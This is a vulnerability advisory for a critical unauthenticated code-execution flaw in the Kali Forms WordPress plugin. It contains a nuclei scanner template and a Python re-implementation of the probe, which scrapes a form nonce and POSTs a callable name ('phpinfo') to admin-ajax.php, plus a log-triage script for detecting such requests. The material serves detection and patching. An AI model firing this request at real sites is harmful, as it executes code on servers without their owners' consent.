WordPress Kali Forms <= 2.4.9 - Remote Code Execution
CVE-2026-3584
Verified
Description
The Kali Forms WordPress plugin, in versions up to and including 2.4.9, contains a remote code execution vulnerability caused by unsafe handling of user input in the 'form_process' and 'prepare_post_data' functions. An unauthenticated attacker can use it to execute code on the server; no account or prior authentication is required.
Severity
Critical
CVSS Score
9.8
Exploit Probability
28%
Affected Product
kali-forms
Published Date
April 9, 2026
Template Author
pussycat0x
CVE-2026-3584.yaml
id: CVE-2026-3584

info:
  name: WordPress Kali Forms <= 2.4.9 - Remote Code Execution
  author: pussycat0x
  severity: critical
  description: |
    The Kali Forms WordPress plugin, in versions up to and including 2.4.9, contains a remote code execution vulnerability caused by unsafe handling of user input in the 'form_process' and 'prepare_post_data' functions. An unauthenticated attacker can use it to execute code on the server; no account or prior authentication is required.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update Kali Forms to a release later than 2.4.9.
  reference:
    - https://wordpress.org/plugins/kali-forms/
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms/kali-forms-249-unauthenticated-remote-code-execution-via-form-process
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-3584
    epss-score: 0.27906
    epss-percentile: 0.96533
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 6
    product: kali-forms
    framework: wordpress
    fofa-query: body="kali-forms"
    shodan-query: http.component:"WordPress" http.html:"kali-forms"
  tags: cve,cve2026,wordpress,wp-plugin,kali-forms,rce,unauth,vkev

flow: |
  var paths = ["/contact-us/", "/contact/", "/form/", "/feedback/", "/"];
  for (var i = 0; i < paths.length; i++) {
    set("form_path", paths[i]);
    if (http(1)) {
      http(2);
      break;
    }
  }

http:
  - raw:
      - |
        GET {{form_path}} HTTP/1.1
        Host: {{Hostname}}

    redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "KaliFormsObject")'
          - 'contains(body, "ajax_nonce")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: nonce
        part: body
        group: 1
        regex:
          - 'ajax_nonce":"([a-f0-9]+)"'
        internal: true

      - type: regex
        name: form_id
        part: body
        group: 1
        regex:
          - 'data-form-id="(\d+)"'
        internal: true

      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - 'kali-forms/[^"]*(?:js|css)\?ver=([0-9.]+)'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=kaliforms_form_process&data[nonce]={{nonce}}&data[formId]={{form_id}}&data[first-name]=test&data[last-name]=user&data[email]=test%40example.com&data[message]=test&data[thisPermalink]=phpinfo

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "phpinfo()</title>"
          - "PHP Extension"
          - "PHP Version"
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: php_version
        part: body
        group: 1
        regex:
          - 'PHP Version ([0-9.]+)'
# digest: 4b0a00483046022100d865cb15c7ed32c92db54f2f1b80d9c27699f8d0070bb10127d7b7947c94882b022100b1f457459d62379aa2f0ee872b96e323211d0f80b9f7d145a48c32bba3cfd2e6:922c64590222798bb761d5b6d8e72950
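The probe above, re-implemented in Python so its extractors, request body and matchers can be exercised without a target. This is an added example, not the template's own code and not the plugin's: the page and response fixtures are constructed (only the three artefacts the template looks for are meaningful, the surrounding markup is invented), and `fetch`/`fake_fetch` are assumed stand-ins for an HTTP client and for a vulnerable host.

```python
"""Offline walk-through of the CVE-2026-3584 nuclei template's probe logic.
Added example: fixtures and the fetch stand-in are constructed, not real."""
import re
from typing import Callable, Optional
from urllib.parse import urlencode

# Candidate paths and patterns copied from the template's flow and extractors.
CANDIDATE_PATHS = ["/contact-us/", "/contact/", "/form/", "/feedback/", "/"]
NONCE_RE = re.compile(r'ajax_nonce":"([a-f0-9]+)"')
FORM_ID_RE = re.compile(r'data-form-id="(\d+)"')
VERSION_RE = re.compile(r'kali-forms/[^"]*(?:js|css)\?ver=([0-9.]+)')
PHP_VERSION_RE = re.compile(r"PHP Version ([0-9.]+)")
PHPINFO_NEEDLES = ("phpinfo()</title>", "PHP Extension", "PHP Version")

# Constructed page fixture: KaliFormsObject with its ajax_nonce, a data-form-id
# attribute and a versioned plugin asset are what the template keys on; the
# rest of the markup is invented for this example.
SAMPLE_FORM_PAGE = """<html><head>
<link rel="stylesheet" href="/wp-content/plugins/kali-forms/assets/front.css?ver=2.4.9">
<script>var KaliFormsObject = {"ajax_url":"/wp-admin/admin-ajax.php","ajax_nonce":"0123abcd45"};</script>
</head><body><div data-form-id="7"></div></body></html>"""

# Constructed stand-in for what the second matcher expects back: phpinfo()
# output, i.e. the submitted callable name was actually executed server-side.
SAMPLE_PHPINFO_PAGE = ("<html><head><title>phpinfo()</title></head><body>"
                       "<h1>PHP Version 8.2.0</h1><h2>PHP Extension</h2></body></html>")


def page_has_form(status: int, body: str) -> bool:
    """Request 1 matcher: 200 and both KaliFormsObject and ajax_nonce present."""
    return status == 200 and "KaliFormsObject" in body and "ajax_nonce" in body


def extract_artifacts(body: str) -> Optional[dict]:
    """Request 1 extractors. The nonce is printed into a public page, so it
    only guards against CSRF and is no authentication barrier for the probe."""
    nonce, form_id, version = (p.search(body) for p in (NONCE_RE, FORM_ID_RE, VERSION_RE))
    if not (nonce and form_id):
        return None
    return {"nonce": nonce.group(1), "form_id": form_id.group(1),
            "version": version.group(1) if version else None}


def build_probe_body(nonce: str, form_id: str, permalink: str = "phpinfo") -> str:
    """Request 2 body. data[...] keys become one nested PHP array on the server;
    safe="[]" keeps the brackets literal, exactly as the template sends them."""
    fields = [("action", "kaliforms_form_process"), ("data[nonce]", nonce),
              ("data[formId]", form_id), ("data[first-name]", "test"),
              ("data[last-name]", "user"), ("data[email]", "test@example.com"),
              ("data[message]", "test"), ("data[thisPermalink]", permalink)]
    return urlencode(fields, safe="[]")


def response_shows_execution(status: int, body: str) -> bool:
    """Request 2 matchers: status 200 plus all three phpinfo banner strings."""
    return status == 200 and all(n in body for n in PHPINFO_NEEDLES)


Fetch = Callable[[str, str, Optional[str]], tuple]


def probe(fetch: Fetch) -> Optional[dict]:
    """Mirror the template's flow: the first path carrying a form gets the POST."""
    for path in CANDIDATE_PATHS:
        status, body = fetch("GET", path, None)
        if not page_has_form(status, body):
            continue
        art = extract_artifacts(body)
        if art is None:
            return {"form_path": path, "vulnerable": False, "reason": "nonce/formId missing"}
        status, body = fetch("POST", "/wp-admin/admin-ajax.php",
                             build_probe_body(art["nonce"], art["form_id"]))
        hit = response_shows_execution(status, body)
        m = PHP_VERSION_RE.search(body) if hit else None
        return {"form_path": path, "version": art["version"], "vulnerable": hit,
                "php_version": m.group(1) if m else None}
    return None  # no candidate path carried a Kali Forms form


def fake_fetch(method: str, path: str, body: Optional[str]) -> tuple:
    """Constructed vulnerable target: a form on /contact/ and a handler that
    'runs' the submitted callable when the harvested nonce is presented."""
    if method == "GET":
        return (200, SAMPLE_FORM_PAGE) if path == "/contact/" else (404, "not found")
    if (path == "/wp-admin/admin-ajax.php" and body
            and "data[nonce]=0123abcd45" in body and "data[thisPermalink]=phpinfo" in body):
        return (200, SAMPLE_PHPINFO_PAGE)
    return (200, "0")  # admin-ajax.php's reply when no handler produced output


if __name__ == "__main__":
    print(probe(fake_fetch))
```

Two things worth keeping in mind when running the real template. The match condition is the phpinfo banner, so a hit means phpinfo() genuinely ran on the target and its output (PHP build, loaded extensions, paths, environment) was returned to the scanner; that is low-impact compared with an arbitrary callable, but it is still code execution against a production host. For a non-intrusive screen, stop after `extract_artifacts` and compare the `version` value it pulls from the asset URLs against 2.4.9, which is what the template's own `version` extractor gives you for free.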
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
CVE-2026-3584
CWE ID:
CWE-94 (Improper Control of Generation of Code, 'Code Injection')
Remediation Steps
Update Kali Forms to a release later than 2.4.9.
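Until the update is applied, the request shape the template sends is also what an exploitation attempt looks like: a POST to admin-ajax.php with action=kaliforms_form_process and a data[thisPermalink] value that is a callable name rather than a page URL. The triage routine below is an added example, not part of the advisory or of the plugin: the request records are constructed, and the assumption that a legitimate data[thisPermalink] is an http(s) URL of the page hosting the form comes from the field's name, not from the plugin's source.

```python
"""Triage of reverse-proxy / WAF request records for CVE-2026-3584 probes.
Added example with constructed records; the 'legitimate value is a page URL'
assumption is the author's, not something the plugin documents."""
import re
from typing import List, Optional
from urllib.parse import parse_qs, urlsplit

# A bare (optionally namespaced or Class::method) identifier is what PHP would
# accept as a callable name; a page permalink never has this shape.
CALLABLE_RE = re.compile(
    r"^\\?[A-Za-z_][A-Za-z0-9_]*(?:\\[A-Za-z_][A-Za-z0-9_]*)*(?:::[A-Za-z_][A-Za-z0-9_]*)?$")


def triage(record: dict, site_host: str) -> Optional[dict]:
    """Return an alert for a kaliforms_form_process request whose
    data[thisPermalink] is not a page URL on this site, else None."""
    if record.get("method") != "POST" or not record.get("uri", "").endswith("/wp-admin/admin-ajax.php"):
        return None
    form = parse_qs(record.get("body", ""), keep_blank_values=True)  # decodes %5B/%5D keys too
    if form.get("action", [""])[0] != "kaliforms_form_process":
        return None
    permalink = form.get("data[thisPermalink]", [""])[0]
    parts = urlsplit(permalink)
    reasons: List[str] = []
    if parts.scheme not in ("http", "https") or not parts.netloc:
        reasons.append("thisPermalink is not an http(s) URL")
    elif parts.hostname != site_host:
        reasons.append("thisPermalink points off-site")
    if CALLABLE_RE.match(permalink):
        reasons.append("thisPermalink is shaped like a PHP callable")
    if not reasons:
        return None
    return {"ts": record.get("ts"), "src": record.get("src"),
            "form_id": form.get("data[formId]", [""])[0],
            "thisPermalink": permalink, "reasons": reasons}


def scan(records: List[dict], site_host: str = "example.com") -> List[dict]:
    """Run triage over a batch of records and keep only the alerts."""
    return [a for a in (triage(r, site_host) for r in records) if a]


# Constructed records: a normal submission, the template's probe, an unrelated
# admin-ajax action and a plain page view.
SAMPLE_RECORDS = [
    {"ts": "2026-04-09T10:00:01Z", "src": "203.0.113.5", "method": "POST",
     "uri": "/wp-admin/admin-ajax.php",
     "body": "action=kaliforms_form_process&data[nonce]=0123abcd45&data[formId]=7"
             "&data[email]=a%40example.com&data[message]=hello"
             "&data[thisPermalink]=https%3A%2F%2Fexample.com%2Fcontact%2F"},
    {"ts": "2026-04-09T10:00:07Z", "src": "198.51.100.23", "method": "POST",
     "uri": "/wp-admin/admin-ajax.php",
     "body": "action=kaliforms_form_process&data[nonce]=0123abcd45&data[formId]=7"
             "&data[first-name]=test&data[last-name]=user&data[email]=test%40example.com"
             "&data[message]=test&data[thisPermalink]=phpinfo"},
    {"ts": "2026-04-09T10:00:09Z", "src": "203.0.113.5", "method": "POST",
     "uri": "/wp-admin/admin-ajax.php", "body": "action=heartbeat&_nonce=deadbeef"},
    {"ts": "2026-04-09T10:00:12Z", "src": "203.0.113.9", "method": "GET",
     "uri": "/contact/", "body": ""},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_RECORDS):
        print(alert)
```

Plain access logs carry no POST body, so this needs a source that records request bodies (a WAF, a reverse proxy with body logging, or PHP-level request logging). It keys on thisPermalink because that is the parameter the template injects into; a clean result means this probe shape was not seen, not that the endpoint was never abused through another field.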